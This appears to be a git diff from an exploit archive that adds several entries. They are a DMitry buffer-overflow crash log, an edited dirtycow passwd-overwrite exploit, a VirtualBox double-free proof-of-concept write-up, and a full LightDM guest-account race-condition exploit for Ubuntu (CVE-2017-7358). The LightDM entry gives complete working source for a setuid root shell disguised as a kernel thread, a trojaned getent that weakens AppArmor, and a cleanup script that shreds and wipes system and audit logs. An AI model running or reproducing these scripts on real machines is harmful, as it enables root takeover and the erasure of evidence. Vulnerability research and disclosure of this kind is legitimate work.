+ERPScan experts were interviewed in specialized info-sec resources and +featured in major media worldwide. Among them there are Reuters, +Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, +Chinabyte, etc. + +Our team consists of highly-qualified researchers, specialized in +various fields of cybersecurity (from web application to ICS/SCADA +systems), gathering their experience to conduct the best SAP security +research. + +9. ABOUT ERPScan + +ERPScan is the most respected and credible Business Application +Cybersecurity provider. Founded in 2010, the company operates globally +and enables large Oil and Gas, Financial, Retail and other +organizations to secure their mission-critical processes. Named as an +‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP +Solution providers” and distinguished by 30+ other awards, ERPScan is +the leading SAP SE partner in discovering and resolving security +vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to +assist in improving the security of their latest solutions. + +ERPScan’s primary mission is to close the gap between technical and +business security, and provide solutions for CISO's to evaluate and +secure SAP and Oracle ERP systems and business-critical applications +from both cyberattacks and internal fraud. As a rule, our clients are +large enterprises, Fortune 2000 companies and MSPs, whose requirements +are to actively monitor and manage security of vast SAP and Oracle +landscapes on a global scale. + +We ‘follow the sun’ and have two hubs, located in Palo Alto and +Amsterdam, to provide threat intelligence services, continuous support +and to operate local offices and partner network spanning 20+ +countries around the globe. + + + + +Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 + +Phone: 650.798.5255 + +Twitter: @erpscan + +Scoop-it: Business Application Security \ No newline at end of file diff --git a/platforms/linux/shellcode/41439.c b/platforms/lin_x86-64/shellcode/41439.c similarity index 100% rename from platforms/linux/shellcode/41439.c rename to platforms/lin_x86-64/shellcode/41439.c diff --git a/platforms/linux/shellcode/41477.c b/platforms/lin_x86-64/shellcode/41477.c similarity index 100% rename from platforms/linux/shellcode/41477.c rename to platforms/lin_x86-64/shellcode/41477.c diff --git a/platforms/linux/dos/41898.txt b/platforms/linux/dos/41898.txt new file mode 100755 index 000000000..a7e88d078 --- /dev/null +++ b/platforms/linux/dos/41898.txt @@ -0,0 +1,107 @@ + ################ +#Exploit Title: Dmitry(Deepmagic Information Gathering Tool) Local Stack Buffer Overflow +#CVE: CVE-2017-7938 +#CWE: CWE-119 +#Exploit Author: Hosein Askari (FarazPajohan) +#Vendor HomePage: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/ +#Version : 1.3a (Unix) +#Exploit Tested on: Parrot OS +#Date: 19-04-2017 +#Category: Application +#Author Mail : hosein.askari@aol.com +#Description: Buffer overflow in DMitry (Deepmagic Information Gathering Tool) version 1.3a (Unix) allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a long argument. An example threat model is automated execution of DMitry with hostname strings found in local log files. +############################### +#valgrind dmitry $(python -c 'print "A"*64') +==11312== Memcheck, a memory error detector +==11312== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. +==11312== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info +==11312== Command: dmitry AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +==11312== +Deepmagic Information Gathering Tool +"There be some deep magic going on" + +ERROR: Unable to locate Host IP addr. for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +Continuing with limited modules +HostIP: +HostName:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +Gathered Inic-whois information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +--------------------------------- +Error: Unable to connect - Invalid Host +ERROR: Connection to InicWhois Server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA failed + +Gathered Netcraft information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +--------------------------------- + +Retrieving Netcraft.com information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +Netcraft.com Information gathered +**11312** *** strcpy_chk: buffer overflow detected ***: program terminated +==11312== at 0x4030DD7: VALGRIND_PRINTF_BACKTRACE (valgrind.h:6818) +==11312== by 0x40353AA: __strcpy_chk (vg_replace_strmem.c:1439) +==11312== by 0x804B5F7: ??? (in /usr/bin/dmitry) +==11312== by 0x8048ED8: ??? (in /usr/bin/dmitry) +==11312== by 0x407D275: (below main) (libc-start.c:291) +==11312== +==11312== HEAP SUMMARY: +==11312== in use at exit: 0 bytes in 0 blocks +==11312== total heap usage: 82 allocs, 82 frees, 238,896 bytes allocated +==11312== +==11312== All heap blocks were freed -- no leaks are possible +==11312== +==11312== For counts of detected and suppressed errors, rerun with: -v +==11312== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0) +====================================== +GDB output: +(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +Starting program: /usr/bin/dmitry AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +Deepmagic Information Gathering Tool +"There be some deep magic going on" + +ERROR: Unable to locate Host IP addr. for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +Continuing with limited modules +*** buffer overflow detected ***: /usr/bin/dmitry terminated +======= Backtrace: ========= +/lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb7e5a37a] +/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb7eeae17] +/lib/i386-linux-gnu/libc.so.6(+0xf60b8)[0xb7ee90b8] +/lib/i386-linux-gnu/libc.so.6(+0xf56af)[0xb7ee86af] +/usr/bin/dmitry[0x8048e04] +/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7e0b276] +/usr/bin/dmitry[0x80490a4] +======= Memory map: ======== +08048000-0804f000 r-xp 00000000 08:01 7209647 /usr/bin/dmitry +0804f000-08050000 r--p 00006000 08:01 7209647 /usr/bin/dmitry +08050000-08051000 rw-p 00007000 08:01 7209647 /usr/bin/dmitry +08051000-08073000 rw-p 00000000 00:00 0 [heap] +b7d9f000-b7dbb000 r-xp 00000000 08:01 24248323 /lib/i386-linux-gnu/libgcc_s.so.1 +b7dbb000-b7dbc000 r--p 0001b000 08:01 24248323 /lib/i386-linux-gnu/libgcc_s.so.1 +b7dbc000-b7dbd000 rw-p 0001c000 08:01 24248323 /lib/i386-linux-gnu/libgcc_s.so.1 +b7dbd000-b7dd1000 r-xp 00000000 08:01 24249970 /lib/i386-linux-gnu/libresolv-2.24.so +b7dd1000-b7dd2000 r--p 00013000 08:01 24249970 /lib/i386-linux-gnu/libresolv-2.24.so +b7dd2000-b7dd3000 rw-p 00014000 08:01 24249970 /lib/i386-linux-gnu/libresolv-2.24.so +b7dd3000-b7dd5000 rw-p 00000000 00:00 0 +b7dd5000-b7dda000 r-xp 00000000 08:01 24249963 /lib/i386-linux-gnu/libnss_dns-2.24.so +b7dda000-b7ddb000 r--p 00004000 08:01 24249963 /lib/i386-linux-gnu/libnss_dns-2.24.so +b7ddb000-b7ddc000 rw-p 00005000 08:01 24249963 /lib/i386-linux-gnu/libnss_dns-2.24.so +b7ddc000-b7dde000 r-xp 00000000 08:01 24249725 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2 +b7dde000-b7ddf000 r--p 00001000 08:01 24249725 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2 +b7ddf000-b7de0000 rw-p 00002000 08:01 24249725 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2 +b7de0000-b7deb000 r-xp 00000000 08:01 24249964 /lib/i386-linux-gnu/libnss_files-2.24.so +b7deb000-b7dec000 r--p 0000a000 08:01 24249964 /lib/i386-linux-gnu/libnss_files-2.24.so +b7dec000-b7ded000 rw-p 0000b000 08:01 24249964 /lib/i386-linux-gnu/libnss_files-2.24.so +b7ded000-b7df3000 rw-p 00000000 00:00 0 +b7df3000-b7fa4000 r-xp 00000000 08:01 24249955 /lib/i386-linux-gnu/libc-2.24.so +b7fa4000-b7fa6000 r--p 001b0000 08:01 24249955 /lib/i386-linux-gnu/libc-2.24.so +b7fa6000-b7fa7000 rw-p 001b2000 08:01 24249955 /lib/i386-linux-gnu/libc-2.24.so +b7fa7000-b7faa000 rw-p 00000000 00:00 0 +b7fd4000-b7fd7000 rw-p 00000000 00:00 0 +b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar] +b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso] +b7fdb000-b7ffd000 r-xp 00000000 08:01 24249741 /lib/i386-linux-gnu/ld-2.24.so +b7ffd000-b7ffe000 rw-p 00000000 00:00 0 +b7ffe000-b7fff000 r--p 00022000 08:01 24249741 /lib/i386-linux-gnu/ld-2.24.so +b7fff000-b8000000 rw-p 00023000 08:01 24249741 /lib/i386-linux-gnu/ld-2.24.so +bffdf000-c0000000 rw-p 00000000 00:00 0 [stack] + +Program received signal SIGABRT, Aborted. +0xb7fd9cf9 in __kernel_vsyscall () \ No newline at end of file diff --git a/platforms/linux/local/40839.c b/platforms/linux/local/40839.c index 202bd501e..6dd80f663 100755 --- a/platforms/linux/local/40839.c +++ b/platforms/linux/local/40839.c @@ -1,4 +1,3 @@ -// EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable. // // This exploit uses the pokemon exploit of the dirtycow vulnerability // as a base and automatically generates a new passwd line. @@ -185,10 +184,10 @@ int main(int argc, char *argv[]) pthread_join(pth,NULL); } - printf("Done! Check %s to see if the new user was created\n", filename); - printf("You can log in with username %s and password %s.\n\n", + printf("Done! Check %s to see if the new user was created.\n", filename); + printf("You can log in with the username '%s' and the password '%s'.\n\n", user.username, plaintext_pw); - printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n", - filename, backup_filename); + printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n", + backup_filename, filename); return 0; -} +} \ No newline at end of file diff --git a/platforms/linux/local/41923.txt b/platforms/linux/local/41923.txt new file mode 100755 index 000000000..c5f5c0a31 --- /dev/null +++ b/platforms/linux/local/41923.txt @@ -0,0 +1,456 @@ +Source: https://blogs.securiteam.com/index.php/archives/3134 + +Vulnerability Summary +The following advisory describes a local privilege escalation via LightDM +found in Ubuntu versions 16.10 / 16.04 LTS. + +Ubuntu is an open source software platform that runs everywhere from IoT +devices, the smartphone, the tablet and the PC to the server and the +cloud. LightDM is an X display manager that aims to be lightweight, fast, +extensible and multi-desktop. It uses various front-ends to draw login +interfaces, also called Greeters. + + +Credit +An independent security researcher, G. Geshev (@munmap), has reported this +vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program + + +Vendor Responses +The vendor has released a patch to address this issue. +For more information: https://www.ubuntu.com/usn/usn-3255-1/ + + +CVE Details +CVE-2017-7358 + + +Vulnerability Details +The vulnerability is found in *LightDM*, which is the Ubuntu’s default +desktop manager, more specifically in the guest login feature. By default +*LightDM* allows you to log into a session as a temporary user. This is +implemented in a script called ‘*guest-account*‘. + +@ubuntu:~$ ls -l /usr/sbin/guest-account +-rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account + +@ubuntu:~$ dpkg -S /usr/sbin/guest-account +lightdm: /usr/sbin/guest-account + +@ubuntu:~$ dpkg -s lightdm +Package: lightdm +Status: install ok installed +Priority: optional +Section: x11 +Installed-Size: 672 +Maintainer: Robert Ancell +Architecture: amd64 +Version: 1.19.5-0ubuntu1 +Provides: x-display-manager +Depends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>= +1.7.0), libglib2.0-0 (>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6 +, adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14), +libpam-modules, plymouth (>= 0.8.8-0ubuntu18) +Pre-Depends: dpkg (>= 1.15.7.2) +Recommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde- +greeter +Suggests: bindfs +Conflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0 +Conffiles: +/etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf +/etc/apparmor.d/abstractions/lightdm_chromium-browser +e1195e34922a67fa219b8b95eaf9c305 +/etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb +/etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf +b76b6b45d7f7ff533c51d7fc02be32f4 +/etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188 +/etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e +/etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e +/etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9 +/etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22 +/etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf +/etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9 +Description: Display Manager +LightDM is a X display manager that: + * Has a lightweight codebase + * Is standards compliant (PAM, ConsoleKit, etc) + * Has a well defined interface between the server and user interface + * Cross-desktop (greeters can be written in any toolkit) +Homepage: https://launchpad.net/lightdm + +@ubuntu:~$ + +The script runs as root when you view the login screen, also known as a +greeter, to log in as a guest. Ubuntu’s default greeter is Unity Greeter. + + +*Vulnerable code* + +The vulnerable function is ‘*add_account*‘. + +35 temp_home=$(mktemp -td guest-XXXXXX) +36 GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]') +37 GUEST_USER=${GUEST_HOME#/tmp/} +38 [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME} + +The guest folder gets created using ‘mktemp’ on line 35. The attacker can +use ‘*inotify*‘ to monitor ‘*/tmp*‘ for the creation of this folder. + +The folder name will likely contain both upper and lower case letters. Once +this folder is created, we grab the folder name and quickly and create the +equivalent folder with all letters lower case. + +If we manage to race the ‘*mv*‘ command on line 38, we end up with the +newly created home for the guest user inside the folder we own. + +Once we have the guest home under our control, we rename it and replace it +with a *symbolic link* to a folder we want to take over. The code below +will then add the new user to the OS. The user’s home folder will already +point to the folder we want to take over, for example ‘*/usr/local/sbin*‘. + +68 useradd --system --home-dir ${GUEST_HOME} --comment $(gettext "Guest") +--user-group --shell /bin/bash ${GUEST_USER} || { +69 rm -rf ${GUEST_HOME} +70 exit 1 +71 } + +The attacker can grab the newly created user’s ID and monitor ‘ +*/usr/local/sbin*‘ for ownership changes. The ownership will be changed by +the following ‘*mount*‘. + +78 mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || { +79 rm -rf ${GUEST_HOME} +80 exit 1 +81 } + +We will remove the symbolic link and create a folder with the same name – +to let the guest user to log in. While the guest is logging in, his path +for finding executable files will include ‘*bin*‘ under his home folder. + +That’s why we create a new symbolic link to point his ‘*bin*‘ into a folder +we control. This way we can force the user to execute our own code under +his user ID. We use this to log out the guest user from his session which +is where we can gain root access. + +The logout code will first execute the following code: + +156 PWENT=$(getent passwd ${GUEST_USER}) || { +157 echo "Error: invalid user ${GUEST_USER}" +158 exit 1 +159 } + +This code will be executed as the owner of the script, i.e. root. Since we +have already taken over ‘*/usr/local/sbin*‘ and have planted our own ‘ +*getent*‘, we get to execute commands as root at this point. + +Note – We can trigger the guest session creation script by entering the +following two commands. + +XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock +XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool +switch-to-guest + + +Proof of Concept + +The Proof of Concept is contains 9 files and they will take advantage of +the race conditions mentioned above. + + 1. kodek/bin/cat + 2. kodek/shell.c + 3. kodek/clean.sh + 4. kodek/run.sh + 5. kodek/stage1.sh + 6. kodek/stage1local.sh + 7. kodek/stage2.sh + 8. kodek/boclocal.c + 9. kodek/boc.c + +By running the following scripts an attacker can run root commands: + +@ubuntu:/var/tmp/kodek$ ./stage1local.sh + +@ubuntu:/var/tmp/kodek$ +[!] GAME OVER !!! +[!] count1: 2337 count2: 7278 +[!] w8 1 minute and run /bin/subash + +@ubuntu:/var/tmp/kodek$ /bin/subash +root@ubuntu:~# id +uid=0(root) gid=0(root) groups=0(root) +root@ubuntu:~# + +If the exploit fails, you can simply run it again. + +Once you get your root shell, you can optionally clean any exploit files +and logs by executing the below. + +root@ubuntu:/var/tmp/kodek# ./clean.sh +/usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such +file or directory +Do you want to remove exploit (y/n)? +y +/usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a +directory + +root@ubuntu:/var/tmp/kodek# + +boc.c + +#include +#include +#include +#include +#include +#include +#include +#include +#define EVENT_SIZE(sizeof(struct inotify_event)) +#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16)) +int main(void) { + struct stat info; + struct passwd * pw; + struct inotify_event * event; + pw = getpwnam("root"); + if (pw == NULL) exit(0); + char newpath[20] = "old."; + int length = 0, i, fd, wd, count1 = 0, count2 = 0; + int a, b; + char buffer[EVENT_BUF_LEN]; + fd = inotify_init(); + if (fd < 0) exit(0); + wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM); + if (wd < 0) exit(0); + chdir("/tmp/"); + while (1) { + length = read(fd, buffer, EVENT_BUF_LEN); + if (length > 0) { + event = (struct inotify_event * ) buffer; + if (event - > len) { + if (strstr(event - > name, "guest-") != NULL) { + for (i = 0; event - > name[i] != '\0'; i++) { + event - > name[i] = tolower(event - > name[i]); + } + if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS) +; + if (event - > mask & IN_MOVED_FROM) { + rename(event - > name, strncat(newpath, event - > name, 15)); + symlink("/usr/local/sbin/", event - > name); + while (1) { + count1 = count1 + 1; + pw = getpwnam(event - > name); + if (pw != NULL) break; + } + while (1) { + count2 = count2 + 1; + stat("/usr/local/sbin/", & info); + if (info.st_uid == pw - > pw_uid) { + a = unlink(event - > name); + b = mkdir(event - > name, ACCESSPERMS); + if (a == 0 && b == 0) { + printf("\n[!] GAME OVER !!!\n[!] count1: %i count2: %i\n", +count1, count2); + } else { + printf("\n[!] a: %i b: %i\n[!] exploit failed !!!\n", a, b +); + } + system("/bin/rm -rf /tmp/old.*"); + inotify_rm_watch(fd, wd); + close(fd); + exit(0); + } + } + } + } + } + } + } +} + +boclocal.c + +#include +#include +#include +#include +#include +#include +#include +#include +#define EVENT_SIZE(sizeof(struct inotify_event)) +#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16)) +int main(void) { + struct stat info; + struct passwd * pw; + struct inotify_event * event; + pw = getpwnam("root"); + if (pw == NULL) exit(0); + char newpath[20] = "old."; + int length = 0, i, fd, wd, count1 = 0, count2 = 0; + int a, b, c; + char buffer[EVENT_BUF_LEN]; + fd = inotify_init(); + if (fd < 0) exit(0); + wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM); + if (wd < 0) exit(0); + chdir("/tmp/"); + while (1) { + length = read(fd, buffer, EVENT_BUF_LEN); + if (length > 0) { + event = (struct inotify_event * ) buffer; + if (event - > len) { + if (strstr(event - > name, "guest-") != NULL) { + for (i = 0; event - > name[i] != '\0'; i++) { + event - > name[i] = tolower(event - > name[i]); + } + if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS) +; + if (event - > mask & IN_MOVED_FROM) { + rename(event - > name, strncat(newpath, event - > name, 15)); + symlink("/usr/local/sbin/", event - > name); + while (1) { + count1 = count1 + 1; + pw = getpwnam(event - > name); + if (pw != NULL) break; + } + while (1) { + count2 = count2 + 1; + stat("/usr/local/sbin/", & info); + if (info.st_uid == pw - > pw_uid) { + a = unlink(event - > name); + b = mkdir(event - > name, ACCESSPERMS); + c = symlink("/var/tmp/kodek/bin/", strncat(event - > name, +"/bin", 5)); + if (a == 0 && b == 0 && c == 0) { + printf("\n[!] GAME OVER !!!\n[!] count1: %i count2: +%i\n[!] w8 1 minute and run /bin/subash\n", count1, count2); + } else { + printf("\n[!] a: %i b: %i c: %i\n[!] exploit failed +!!!\n[!] w8 1 minute and run it again\n", a, b, c); + } + system("/bin/rm -rf /tmp/old.*"); + inotify_rm_watch(fd, wd); + close(fd); + exit(0); + } + } + } + } + } + } + } +} + +clean.sh + +#!/bin/bash +if [ "$(/usr/bin/id -u)" != "0" ]; then + echo "This script must be run as root" 1>&2 + exit 1 +fi +/bin/rm -rf /tmp/guest-* /tmp/old.guest-* +/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern +.log /var/log/audit/audit.log /var/log/lightdm/* +/bin/echo > /var/log/auth.log +/bin/echo > /var/log/syslog +/bin/dmesg -c >/dev/null 2>&1 +/bin/echo "Do you want to remove exploit (y/n)?" +read answer +if [ "$answer" == "y" ]; then +/usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/* +/bin/rm -rf /var/tmp/kodek +else +exit +fi + +run.sh + +#!/bin/sh +/bin/cat << EOF > /usr/local/sbin/getent +#!/bin/bash +/bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1 +/bin/chmod 4111 /bin/subash >/dev/null 2>&1 +COUNTER=0 +while [ \$COUNTER -lt 10 ]; do +/bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1 +let COUNTER=COUNTER+1 +done +/bin/sed -i 's/\/usr\/lib\/lightdm\/lightdm-guest-session +{/\/usr\/lib\/lightdm\/lightdm-guest-session flags=(complain) {/g' /etc/ +apparmor.d/lightdm-guest-session >/dev/null 2>&1 +/sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2> +&1 +/usr/bin/getent passwd "\$2" +EOF +/bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1 + +shell.c + +#define _GNU_SOURCE +#include +#include +#include +#include + +int main(void) +{ + setresuid(0, 0, 0); + setresgid(0, 0, 0); + setgroups(0, NULL); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "[bioset]", "-pi", NULL); + return 0; +} + +stage1.sh + +#!/bin/bash +if [ "${PWD}" == "/var/tmp/kodek" ]; then +/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1 +/usr/bin/killall -9 boc >/dev/null 2>&1 +/bin/sleep 3s +/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2> +&1 +/usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc +/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell +/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh +/var/tmp/boc +else +echo "[!] run me from /var/tmp/kodek" +exit +fi + +stage1local.sh + +#!/bin/bash +if [ "${PWD}" == "/var/tmp/kodek" ]; then +/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1 +/usr/bin/killall -9 boc >/dev/null 2>&1 +/bin/sleep 3s +/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2> +&1 +/usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc +/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell +/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh +/var/tmp/boc & +/bin/sleep 5s +XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock +XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool +switch-to-guest +else +echo "[!] run me from /var/tmp/kodek" +exit +fi + +stage2.sh + +#!/bin/sh +/usr/bin/systemd-run --user /var/tmp/run.sh + +/bin/cat + +#!/bin/sh +/usr/bin/systemd-run --user /var/tmp/run.sh +/bin/sleep 15s +/bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/ +head -1 | /usr/bin/awk '{ print $1 }'` \ No newline at end of file diff --git a/platforms/multiple/dos/41931.html b/platforms/multiple/dos/41931.html new file mode 100755 index 000000000..ac67971d2 --- /dev/null +++ b/platforms/multiple/dos/41931.html @@ -0,0 +1,67 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/41932.cpp b/platforms/multiple/dos/41932.cpp new file mode 100755 index 000000000..9c6fa6daa --- /dev/null +++ b/platforms/multiple/dos/41932.cpp @@ -0,0 +1,198 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227 + +We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted. + +We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant. + +It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case). + +If we assume that the shared folder is mounted as drive E, we can start the PoC as follows: + +>VirtualBoxKiller.exe E:\ + +Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following: + +--- cut --- + 3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end); + 1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end); +--- cut --- + +The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows: + +--- cut --- + 1: kd> g + Critical error detected c0000374 + Break instruction exception - code 80000003 (first chance) + ntdll!RtlReportCriticalFailure+0x2f: + 0033:00000000`76f3f22f cc int 3 + + 1: kd> kb + RetAddr : Args to Child : Call Site + 00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f + 00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26 + 00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12 + 00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4 + 00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72 + 00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa + 000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c + 000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef + 000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686 + 000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48 + 000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62 + 000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c + 000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f + 00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122 + 00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43 + 00000000`76d759bd : 00000000`00000000 00000000`00000000 